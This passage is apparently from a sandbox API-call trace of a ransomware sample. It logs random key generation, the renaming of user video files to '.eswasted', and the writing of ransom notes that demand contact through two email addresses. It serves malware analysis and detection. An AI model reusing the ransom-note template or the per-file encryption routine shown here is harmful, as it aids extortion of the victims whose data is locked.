(hObject=0xfc) returned 1 [0082.181] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0082.182] CloseHandle (hObject=0xf8) returned 1 [0082.182] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0082.182] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.183] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0082.183] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.183] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.184] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.184] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.193] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0082.193] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.193] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.193] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]DnO4fgTjRiD7AgaEmLw3SvYYg2PqH1QsXSdmggeXJNxFkw4yLQdPBjrZYX3hAyIL\r\npR5c4UrIHA6qjfNasc19H5xX6cTFUS9fp3xdYE1mLJOWBWqsFvyEFBdJapIdgF9B\r\n6uWnZVlkEjpeCLvMHqXmj8yRPs6wVRx5HsfqXt0OG8NpZCsPv1uHJCAVt1oolyQa\r\n+D8ewaHfrc4yfFuxo2T0xot49sPns8biLa3tWS6mzAnWKAPCktOOOI4mobeYFQkC\r\nbj6zDb6AXDl2R43rlkeCCgfmxB9Rn7N48D0/V1/E7BeGlsQXAjYG2OS1kVPaes+h\r\n/1TZk7Ou1SA1n5hAcST8tVTZMZVMei/Kq7Zz7wz80+NVllB+6yBQoNAZeXDE5Q5e\r\nV9QWpaFW5PLkaGyiQDBAOPGVY1zcyo2p7gg9qPuPqo/2nZ1AX0x2ntVW1M/Q4vM2\r\ndiEIcFEZ9p/Ai3mLzEbhNdn4wGfLxjCn1d+kGS3rlt76tAZZsadQhdBPDZeJRy9s\r\nsDXOTd7ZB+6XUCBAn8ajh5erpk+rTFNAFCgcIil5SeQrPEfNcJ9gPfXjRd1+VT/c\r\nqIK3eqJpsy4xsZ0+COj6DwN767p+cpSXrC3bU3NzA6WC3JW2JFqnDele9sRky4It\r\n+eKJf+FGqio4y30GZK0AI7iL+c77aTbYC5oQk4yTbi2=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.239] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.239] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.240] SetEndOfFile (hFile=0x118) returned 1 [0082.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.242] CloseHandle (hObject=0x118) returned 1 [0082.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5448 | out: hHeap=0x4a0000) returned 1 [0082.243] _aulldvrm () returned 0x0 [0082.243] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e6078) returned 1 [0082.244] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.244] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.244] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\AauZtvXiL6sm FxBhu.swf") returned 83 [0082.244] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b0) returned 0x4f6210 [0082.244] lstrcpyW (in: lpString1=0x4f62b6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.244] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.244] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e6078) returned 1 [0082.245] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.245] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\AauZtvXiL6sm FxBhu.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\aauztvxil6sm fxbhu.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.245] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.246] SetEndOfFile (hFile=0x118) returned 1 [0082.246] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.246] lstrcpyW (in: lpString1=0x4f62b6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\AauZtvXiL6sm FxBhu.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\aauztvxil6sm fxbhu.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\AauZtvXiL6sm FxBhu.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\aauztvxil6sm fxbhu.swf.eswasted")) returned 1 [0082.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\AauZtvXiL6sm FxBhu.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\aauztvxil6sm fxbhu.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.247] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.247] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xadbc [0082.248] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xadbc) returned 0x2d0000 [0082.248] CloseHandle (hObject=0xf8) returned 1 [0082.251] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.251] CloseHandle (hObject=0xfc) returned 1 [0082.251] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de1e0 [0082.251] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e6078) returned 1 [0082.252] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4de228 | out: pbBuffer=0x4de228) returned 1 [0082.252] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.252] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e6078) returned 1 [0082.253] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.253] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.262] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4d91a8 [0082.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.262] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.262] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]b5DVBqw71P4ZLh25zT2UusQsrhf5OHrZW+gnQZtmJYnreO57wrnGUToC6kWxeIzH\r\nm4k/IE9iCbqrqvDSF5qw55v0qW16giXO7FYFFiOlyQGi9uirl3igoh9tnw+2Y3vn\r\no3bmFG9UKU6YX5BjkisYIegSOOl/f+QxNjmYJlh0E+RJ6uNHrlT0Bi2Ol2+DudmB\r\nnhR2efYV/x0QIocTVRdoxbR2bxxWNkIgFcs1Rx+yiZ1LfDMUhNQlegvaC2n28rYo\r\nllAP22VwFHLbOPFKDniZLUcGKu56XFlRfs7lUCgjm9QHpfnYRequwjjSiDgGPNky\r\nPvEaJxfxwVDem4IKwErY6jpdgcNg9pD0sPRvXyszWoAsx0ND2lz9HlNGNV5PEnis\r\nXOMheVCtuAcgIRNujcfHiXc8sJgJXVs65MYDsN0voROPPdKLoKMrDfrJ8Nb3EQWq\r\nzjzj4J8VWkNxosWJSDU66Itd1SVKyNpET4uZdIeWjZgZ+9QjtlDEOgUd0faUJbG3\r\npRl0AiZXw7Zy8u0NSbWUsvcAPzRxGJ6iTCzxRxSgAG9gdF0sShiSwSdY8tjmWvKn\r\nU3pLLYedPFx0GeaGE1xfTfDYZE8N3U0oYvm9Cp96sDSe83arJidoS5TSm4mQyxFm\r\ntKJVzDExNixmE9wxEoug4X/7vpPgbGIESj+s9WE5ym4=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.262] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.262] SetEndOfFile (hFile=0x118) returned 1 [0082.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.264] CloseHandle (hObject=0x118) returned 1 [0082.266] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0082.266] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fc348 | out: hHeap=0x4a0000) returned 1 [0082.266] _aulldvrm () returned 0x0 [0082.267] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e6078) returned 1 [0082.267] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.267] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\DjbqV_JkVRy5N uQ.mkv") returned 81 [0082.267] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f6210 [0082.267] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.267] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.268] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e6078) returned 1 [0082.268] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.268] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\DjbqV_JkVRy5N uQ.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\djbqv_jkvry5n uq.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.269] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.270] SetEndOfFile (hFile=0x118) returned 1 [0082.270] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.270] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.270] lstrcpyW (in: lpString1=0x4f62b2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\DjbqV_JkVRy5N uQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\djbqv_jkvry5n uq.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\DjbqV_JkVRy5N uQ.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\djbqv_jkvry5n uq.mkv.eswasted")) returned 1 [0082.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\DjbqV_JkVRy5N uQ.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\djbqv_jkvry5n uq.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.271] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.271] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xf3e2 [0082.271] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf3e2) returned 0x2d0000 [0082.271] CloseHandle (hObject=0xfc) returned 1 [0082.275] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.275] CloseHandle (hObject=0xf8) returned 1 [0082.275] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de1e0 [0082.275] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e6078) returned 1 [0082.276] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4de228 | out: pbBuffer=0x4de228) returned 1 [0082.276] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.276] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e6078) returned 1 [0082.277] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.277] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0082.285] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4d91a8 [0082.285] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.285] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.285] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iOmvK+h63yE9YecOH6Cfc48kUxXwIUPM9wm0hCVQavsij3Eu3FdB0wP0YoTbJ/K7\r\n+c6Pw6YanxHvWlz72MVQZGHk68g2fHbGVu8myxM6a1+y5JIu5OKOSQ7URLqKEYqd\r\nzAObkqjYFDLHh//t9+KOiUdxLsz2o8uA2pFurgkCfZ/DKgOonTFASR4PPigxHMAE\r\n8+ypzGaI1k8sWneYNn19UvCiTVvk/vYO0wXnQoSJmGxKbwW0OwLs1pQw2jjx5Y8b\r\nHu0QhXTbi8PO0h12OE4mZ5R7CEH3zQBNfyfzUurahnMUfh0DFBX9dW4p2kAbOJPA\r\nPNMtYJxvYZirCe/zd9U2x6V1Nj/5ZGomffOptsoQvNgE4+GuMj7c0ym4WGBdyCdZ\r\nJXYLJWlIkI2aGpRoBbgHXtxC4qNGe5ka2G8jYpagLAYi4Bp7Rd/QZLUGZPrThykh\r\nXYwTtYgr1BKXYf2H1LipA9TMcRqz/A4+foIBKmrpIid3X0vbalfYcJ53cE2YpYKB\r\n7//u0iX8lHdhh3ZFfDxlWYphPeuhysf3+5SyKVQIcXO0Q6Dsb7KFXkmd/xzyHn/w\r\nL/jFGgQDu02tk0aOYLgPnon5RdUBqOkY4MYmB0r3gR8EHMOzm81lFkWc6mYSjnoi\r\ncPwzU8CsE9xl7+s2dHGgUUKRYSoI1YYA84aX2GEHvT4=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.285] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.285] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.285] SetEndOfFile (hFile=0x118) returned 1 [0082.334] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.334] CloseHandle (hObject=0x118) returned 1 [0082.336] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f6210 | out: hHeap=0x4a0000) returned 1 [0082.336] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fc448 | out: hHeap=0x4a0000) returned 1 [0082.336] _aulldvrm () returned 0x0 [0082.336] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.337] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.337] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\RsXCRyN8LTe.swf") returned 76 [0082.337] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ef648 [0082.337] lstrcpyW (in: lpString1=0x4ef6e0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.337] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.337] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.338] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.338] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\RsXCRyN8LTe.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\rsxcryn8lte.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.354] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.355] SetEndOfFile (hFile=0x118) returned 1 [0082.355] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.355] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.355] lstrcpyW (in: lpString1=0x4ef6e0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.355] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\RsXCRyN8LTe.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\rsxcryn8lte.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\RsXCRyN8LTe.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\rsxcryn8lte.swf.eswasted")) returned 1 [0082.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\AhQlb\\RsXCRyN8LTe.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\ahqlb\\rsxcryn8lte.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.357] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0082.357] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xe1fa [0082.357] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe1fa) returned 0x2d0000 [0082.357] CloseHandle (hObject=0xf8) returned 1 [0082.361] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.361] CloseHandle (hObject=0xfc) returned 1 [0082.362] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0082.362] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.362] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0082.362] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.362] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.363] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.363] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.372] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, 